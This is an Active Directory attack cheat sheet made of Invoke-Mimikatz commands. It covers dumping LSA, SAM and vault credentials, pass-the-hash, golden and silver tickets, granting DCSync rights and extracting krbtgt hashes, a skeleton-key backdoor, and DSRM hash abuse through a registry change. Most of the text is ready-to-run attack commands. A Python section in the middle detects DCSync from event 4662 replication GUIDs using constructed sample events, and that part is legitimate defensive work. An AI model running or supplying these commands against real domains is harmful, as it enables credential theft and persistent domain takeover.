Dump hashes from local machine
Invoke-Mimikatz -DumpCreds
To dump all the hashes
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
To dump hashes from SAM
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
To view clear text credentials from credential vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
OVER PASS THE HASH ATTACK
Perform Pass The Hash for a specific user
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<USER DOMAIN> /ntlm:<NTLM HASH OF USER> /run:powershell.exe"'
GOLDEN TICKET ATTACK
Execute mimikatz as Domain Admin on DC to get krbtgt NTLM hash
Perform Golden Ticket Attack for a specific user
Invoke-Mimikatz -Command '"kerberos::golden /user:<USERNAME> /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /krbtgt:<NTLM OF KRBTGT> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
SILVER TICKET ATTACK
Perform Silver Ticket Attack for a specific user
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<TARGET COMPUTER NAME> /service:HOST /rc4:<NTLM OF MACHINE> /user:<USERNAME> /ptt"'
DC SYNC ATTACK
Check replication rights for a specific user
Get-ObjectAcl -DistinguishedName "dc=<SUBDOMAIN NAME>,dc=<DOMAIN.../FORESTNAME>,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<USERNAME>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
To add replication/DCSync rights for a specific user (Needs Domain Admin Privileges)
Add-ObjectAcl -TargetDistinguishedName "dc=<SUBDOMAIN>,dc=<DOMAIN.../FOREST>,dc=local" -PrincipalSamAccountName <USERNAME> -Rights DCSync -Verbose
Perform DCSync attack to extract the "krbtgt" hashes, which can be used to perform Golden Ticket attacks in the future
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
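The detection side of the above, as an added example that is not part of the original cheat sheet: a DCSync replication shows up on the DC as Security event 4662 whose Properties field carries the replication extended-right GUIDs, and only domain controllers (and sanctioned sync services) should ever exercise them. The GUIDs are the ones Active Directory defines; the event records, the DCORP domain, the "student1" account and the allowlist are constructed sample data.

```python
import re

# Extended-right GUIDs a principal exercises when replicating directory data
# (real AD schema values). Everything else in this file is constructed sample data.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed Security-log records in the shape of exported 4662 events
# (field names follow the event XML). Only the second record should fire.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DCORP-DC$", "SubjectDomainName": "DCORP",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "student1", "SubjectDomainName": "DCORP",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "student1", "SubjectDomainName": "DCORP",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # non-replication object access
    {"EventID": 4624, "SubjectUserName": "student1", "SubjectDomainName": "DCORP",
     "Properties": ""},  # a logon event, not an object-access event
]


def replication_rights_used(event):
    """Return the replication rights named in a 4662 event's Properties field."""
    if event.get("EventID") != 4662:
        return []
    guids = (g.lower() for g in GUID_RE.findall(event.get("Properties", "")))
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]


def find_dcsync(events, trusted_replicators):
    """Flag replication by any principal outside the allowlist.

    trusted_replicators holds DOMAIN\\account names of the domain controllers
    and of sanctioned sync services (e.g. a directory-sync service account);
    any other principal exercising replication rights is a DCSync candidate.
    """
    allow = {a.lower() for a in trusted_replicators}
    hits = []
    for ev in events:
        rights = replication_rights_used(ev)
        if not rights:
            continue
        who = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if who.lower() not in allow:
            hits.append((who, rights))
    return hits


if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_EVENTS, {"DCORP\\DCORP-DC$"}):
        print(f"possible DCSync by {who}: {', '.join(rights)}")
```

Auditing of "Replicating Directory Changes" on the domain object must be enabled for 4662 to be written at all, and every legitimate replicator (each DC's computer account, any sync service) belongs in the allowlist or the check will page on normal traffic.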
SKELETON KEY ATTACK
Needs Domain Admin privileges on the DC and works only once per DC until that DC is rebooted
Perform Skeleton Key Attack (Password: mimikatz; valid for all users until the DC is restarted)
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
USING DSRM HASH
Dump the DSRM Administrator hash from SAM of DC
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
The DSRM Administrator is not allowed to log on to the Domain Controller by default
The following registry value has to be changed on the DC to allow that logon
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Now, we can just use Pass The Hash to gain access to the DC's file system remotely
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<DSRM OF DC> /run:powershell.exe"'